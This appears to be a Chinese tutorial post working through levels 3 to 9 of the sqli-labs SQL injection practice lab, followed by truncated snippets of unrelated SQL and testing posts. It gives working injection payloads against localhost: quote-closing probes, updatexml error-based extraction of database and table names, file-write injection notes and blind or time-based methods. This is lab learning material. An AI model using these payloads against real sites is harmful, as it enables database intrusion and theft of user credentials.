sql測試平台3 最後一關

2021-09-16 12:55:58 字數 2482 閱讀 5740

less3:

id儲存格式為id=('1'),所以測試的時候http://localhost/sqll/sqli-labs-master/less-3/?id=3』)%23才對

less4:

id儲存格式為id=("1")http://localhost/sqll/sqli-labs-master/less-4/?id=1%22)%23

介紹group_concat用法

group_concat([distinct] 要連線的字段 [order by asc/desc 排序字段] [separator '分隔符'])

爆出第四關所有使用者名稱和密碼:

less5==基於錯誤的注入

count()    //計算總數

concat() //連線字串

floor() //向下取整數

rand() //產生0~1的隨機數

rand(0) //序列是011011

首先可以看出這是單引號型,然後不同的是只能根據報錯資訊來判斷

看到資料庫長度:localhost/sqll/sqli-labs-master/less-5/?id=1' and length(database())>=8%23  //為8

and left(database(),2)=』se』--+  //猜

updatexml函式:

爆出資料庫名:localhost/sqll/sqli-labs-master/less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23

爆出表名:localhost/sqll/sqli-labs-master/less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) %23

注意中間select group_concat的使用

less6

同less5,不過這裡是雙引號型

匯出檔案注入

less7

通過id=1&&id=1'&&id=1"的不同可以確定id儲存格式為id=(('1'))

注入資訊到伺服器檔案:

ps:路徑問題:mysql中my.ini中必須要指定secure_file_priv路徑,如果沒有自己寫乙個路徑

ps2:1.txt不存在於該目錄下

然後就可以爆資料庫-》爆資料表-》爆使用者名稱和密碼

===爆密碼和使用者

盲注:猜資料---寫python指令碼

時間注入也可採用不過速度會慢一些

less9

SQL獲取每月最後一天記錄

declare dtdatetime set dt getdate declare number intset number 3 1 指定日期該年的第一天或最後一天 a.年的第一天 select convert char 5 dt,120 1 1 b.年的最後一天 select convert ch...

SQL某人最後一條使用日期記錄。

declare tb table 使用者id varchar 5 使用日期 datetime,使用時間 datetime,有效期 int,消費點數 int insert tb select 10001 2009 02 01 10 21 32 2010 01 31 0,1000 union all s...

介面測試平台番外 正交工具3

我們之前的進入小工具的頁面已經成功了。本節課就來實際做一下 所謂正交,其實就是對 多個輸入條件 的多個子狀態,生成用例的方法。我們先要做的就是前端的互動。其實很簡單,就是個 類似於我們介面請求體的form data那種可以自行增加行數的 每行分為key和value,key就是輸入條件的名稱,valu...